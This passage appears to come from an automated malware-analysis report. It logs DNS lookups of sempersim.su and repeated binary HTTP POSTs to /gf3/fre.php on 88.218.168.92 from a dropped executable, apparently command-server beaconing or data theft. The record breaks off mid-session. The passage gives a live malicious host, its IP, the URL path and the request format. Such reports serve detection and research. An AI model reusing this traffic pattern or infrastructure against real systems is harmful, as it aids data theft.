                  May 4, 2022 17:06:57.664119005 CEST192.168.2.48.8.8.80x3bfeStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:00.131350994 CEST192.168.2.48.8.8.80xac63Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:04.517652988 CEST192.168.2.48.8.8.80x2376Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:06.131412983 CEST192.168.2.48.8.8.80x2bb4Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:08.472306013 CEST192.168.2.48.8.8.80x194bStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:12.396862984 CEST192.168.2.48.8.8.80x3300Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:15.184930086 CEST192.168.2.48.8.8.80x53adStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:18.109793901 CEST192.168.2.48.8.8.80x2661Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:20.576478004 CEST192.168.2.48.8.8.80x55f1Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:24.388511896 CEST192.168.2.48.8.8.80x39deStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:26.375874043 CEST192.168.2.48.8.8.80x5e12Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:29.203284979 CEST192.168.2.48.8.8.80x59f0Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:32.534837961 CEST192.168.2.48.8.8.80xe73eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:34.907866955 CEST192.168.2.48.8.8.80xf766Standard query (0)sempersim.suA (IP address)IN (0x0001)
                  May 4, 2022 17:07:36.027148962 CEST192.168.2.48.8.8.80xcd3eStandard query (0)sempersim.suA (IP address)IN (0x0001)
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  May 4, 2022 17:05:43.086805105 CEST8.8.8.8192.168.2.40xc6aeNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:46.213469028 CEST8.8.8.8192.168.2.40xef5fNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:50.132235050 CEST8.8.8.8192.168.2.40x6bfaNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:51.897289038 CEST8.8.8.8192.168.2.40x9024No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:53.782625914 CEST8.8.8.8192.168.2.40x9202No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:56.569468975 CEST8.8.8.8192.168.2.40xc949No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:56.663363934 CEST8.8.8.8192.168.2.40xc949No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:05:58.368366957 CEST8.8.8.8192.168.2.40x19e4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:01.400378942 CEST8.8.8.8192.168.2.40x20e9No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:03.534624100 CEST8.8.8.8192.168.2.40x77c9No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:09.107700109 CEST8.8.8.8192.168.2.40x40cNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:11.001914024 CEST8.8.8.8192.168.2.40x6a5No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:13.274743080 CEST8.8.8.8192.168.2.40x2059No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:15.868463039 CEST8.8.8.8192.168.2.40xba1bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:18.127079010 CEST8.8.8.8192.168.2.40xf9a1No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:19.549356937 CEST8.8.8.8192.168.2.40x5dafNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:21.109705925 CEST8.8.8.8192.168.2.40x230dNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:22.855032921 CEST8.8.8.8192.168.2.40x1e5aNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:27.231436968 CEST8.8.8.8192.168.2.40xbc8aNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:29.068125963 CEST8.8.8.8192.168.2.40x8679No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:31.260615110 CEST8.8.8.8192.168.2.40x34bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:33.099653959 CEST8.8.8.8192.168.2.40x2cd0No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:34.700314999 CEST8.8.8.8192.168.2.40xd7f4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:36.238348961 CEST8.8.8.8192.168.2.40x88a6No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:38.244344950 CEST8.8.8.8192.168.2.40xcb91No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:40.164742947 CEST8.8.8.8192.168.2.40x8a6fNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:45.984704018 CEST8.8.8.8192.168.2.40x6a3bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:47.466262102 CEST8.8.8.8192.168.2.40x9757No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:51.087764978 CEST8.8.8.8192.168.2.40xa712No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:54.155487061 CEST8.8.8.8192.168.2.40x63e7No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:06:57.683183908 CEST8.8.8.8192.168.2.40x3bfeNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:00.149154902 CEST8.8.8.8192.168.2.40xac63No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:04.536412001 CEST8.8.8.8192.168.2.40x2376No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:06.148112059 CEST8.8.8.8192.168.2.40x2bb4No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:08.490387917 CEST8.8.8.8192.168.2.40x194bNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:12.413196087 CEST8.8.8.8192.168.2.40x3300No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:15.203217030 CEST8.8.8.8192.168.2.40x53adNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:18.128374100 CEST8.8.8.8192.168.2.40x2661No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:20.593101025 CEST8.8.8.8192.168.2.40x55f1No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:24.405092955 CEST8.8.8.8192.168.2.40x39deNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:26.394052982 CEST8.8.8.8192.168.2.40x5e12No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:29.221874952 CEST8.8.8.8192.168.2.40x59f0No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:32.551269054 CEST8.8.8.8192.168.2.40xe73eNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:34.926085949 CEST8.8.8.8192.168.2.40xf766No error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  May 4, 2022 17:07:36.133327961 CEST8.8.8.8192.168.2.40xcd3eNo error (0)sempersim.su88.218.168.92A (IP address)IN (0x0001)
                  • sempersim.su
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44975888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:43.139332056 CEST1040OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 190
                  Connection: close
                  May 4, 2022 17:05:43.679094076 CEST1040INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:19 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44975988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:46.967262983 CEST1041OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 190
                  Connection: close
                  May 4, 2022 17:05:47.694180965 CEST1137INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.44977888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:11.039757967 CEST1386OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:11.460186005 CEST1386INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:47 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.44977988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:13.307202101 CEST1387OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:13.754757881 CEST1388INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:50 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.44978088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:15.931925058 CEST1389OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:16.374113083 CEST1389INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:52 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.44978188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:18.169397116 CEST1390OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:18.577426910 CEST1391INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.44978288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:19.592401981 CEST1391OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:20.073584080 CEST1392INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:56 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.44978388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:21.151210070 CEST1393OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:21.587323904 CEST1393INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:57 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.44978488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:22.890811920 CEST1394OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:23.295314074 CEST1395INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:59 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.44978588.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:27.338927984 CEST1396OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:27.621609926 CEST1396INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:04 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.44978688.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:29.101313114 CEST1397OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:29.614717007 CEST1398INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:05 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.44978788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:31.292534113 CEST1398OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:31.742971897 CEST1399INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44976188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:05:50.222184896 CEST1138OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:05:50.684990883 CEST1139INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:05:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.44978888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:33.132720947 CEST1400OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:33.611125946 CEST1400INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.44978988.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:34.736742973 CEST1401OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:35.234499931 CEST1402INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.44979088.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:36.270567894 CEST1403OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:36.675434113 CEST1403INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:12 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.44979188.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:38.277874947 CEST1404OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:38.732588053 CEST1405INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:14 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.44979288.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:40.198896885 CEST1405OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:40.593791962 CEST1406INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:16 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.44979388.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:46.019048929 CEST1407OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:46.460576057 CEST1407INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:22 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.44979488.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:47.499152899 CEST1408OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:47.985481024 CEST1409INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:24 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.44979788.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:51.121382952 CEST1424OUTPOST /gf3/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: sempersim.su
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 1234DF8C
                  Content-Length: 163
                  Connection: close
                  May 4, 2022 17:06:51.541780949 CEST1456INHTTP/1.0 404 Not Found
                  Date: Wed, 04 May 2022 15:06:27 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.44979888.218.168.9280C:\Users\user\AppData\Local\Temp\dehbibhar.exe
                  TimestampkBytes transferredDirectionData
                  May 4, 2022 17:06:54.199563980 CEST1457OUTPOST /gf3/fre.php HTTP/1.0
